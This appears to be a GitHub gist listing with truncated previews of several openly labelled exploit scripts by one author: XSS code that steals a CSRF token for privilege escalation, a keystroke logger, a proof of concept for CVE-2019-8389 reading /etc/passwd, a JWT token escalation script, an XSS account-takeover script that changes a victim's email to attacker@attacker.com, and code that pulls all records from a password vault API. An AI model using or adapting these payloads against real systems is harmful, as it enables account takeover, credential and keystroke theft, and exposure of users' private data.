View XSS_Privilege_Escalation.js
// XSS Exploit code for Privilege Escalation | |
// Author: Shawar Khan | |
var woot = document.createElement('html'); | |
fetch('https://vulnerablesite.com/settings',{credentials: 'include'}).then((resp) => resp.text()).then(function(data){ | |
woot.innerHTML=data; | |
var csrf_token = woot.getElementsByTagName('meta')[3]['content']; | |
privilege_escalate(); |
View exptest.js
var keys = ''; | |
document.onkeypress = function(e) { | |
var get = window.event ? event : e; | |
var key = get.keyCode ? get.keyCode : get.charCode; | |
key = String.fromCharCode(key); | |
keys += key;---- | |
} | |
window.setInterval(function(){ |
View Musicloud-exploit.py
#!/usr/bin/python | |
# Proof of concept for CVE-2019-8389 | |
# Exploit author: Shawar Khan | |
import sys | |
import requests | |
def usage(): | |
print "Usage:\n\tpython musicloud_lfi.py 192.168.8.103 /etc/passwd\n" |
View token.py
# A sample code that obtains a permanent JWT token when provided a temporary JWT token | |
import json | |
import requests | |
import sys | |
from requests.packages.urllib3.exceptions import InsecureRequestWarning | |
requests.packages.urllib3.disable_warnings(InsecureRequestWarning) | |
jwt_token=raw_input("Enter token > ") | |
exploit_url = "https://secure.site.com:443/aapi/v1/authentications/token" | |
exploit_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "https://www.site.com", "authorization": "Bearer "+str(jwt_token), "content-type": "application/json", "origin": "https://www.site.com", "Connection": "clos"} |
View alert.js
alert(1337) |
View email_change_exploit_xss.js
// a Simple XSS exploit for email change | |
// Shawar Khan | |
var dark_window = window.open('https://www.target.com/settings'); | |
dark_window.addEventListener('load', | |
function exploit_run(){ | |
dark_window.document.body.getElementsByTagName('form')[0][2].value='attacker@attacker.com' // changes email | |
dark_window.document.body.getElementsByTagName('form')[0][40].click() // clicks for submission |
View password_vault_exploit.js
//Exploit Code by Shawar Khan | |
var data_chunks = ''; | |
// Capturing Records from API | |
fetch('https://redacted.com/api/v3/records/all').then((resp) => resp.text()).then(function(data) { | |
// Holds the records in as String | |
var allrecords = data; | |
// converting response to JSON |